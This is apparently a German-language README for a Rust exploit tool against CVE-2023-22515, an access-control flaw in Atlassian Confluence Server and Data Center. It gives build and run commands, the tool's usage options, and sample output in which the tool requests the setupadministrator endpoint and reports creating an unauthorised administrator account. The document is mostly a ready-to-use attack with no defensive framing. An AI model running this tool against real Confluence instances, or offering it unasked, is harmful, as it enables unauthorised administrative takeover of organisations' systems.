
Rust-basierter Exploit für CVE-2023-22515, der über eine fehlerhafte Zugriffskontrolle nicht autorisierte Administrator-Konten in Confluence Server und Data Center erstellt.
Confluence ist ein webbasiertes Enterprise-Wiki, das vom australischen Softwareunternehmen Atlassian entwickelt wurde. Atlassian wurde auf ein Problem aufmerksam gemacht, das von einigen Kunden gemeldet wurde: Externe Angreifer könnten eine bisher unbekannte Schwachstelle in öffentlich zugänglichen Confluence-Server- und Data-Center-Instanzen ausgenutzt haben, um nicht autorisierte Confluence-Administratorkonten zu erstellen und auf Confluence-Instanzen zuzugreifen.
Die Schwachstelle wurde als CVE-2023-22515 eingestuft.
Führen Sie zunächst die Kompilierung mit dem folgenden Befehl durch:
cargo build --release
Sie können dies auf zwei Arten tun:
cargo run -- --target http://localhost --username "teste" --password "teste"
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
Dies zeigt die Hilfe für das Tool an. Hier sind alle Schalter, die es unterstützt:
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!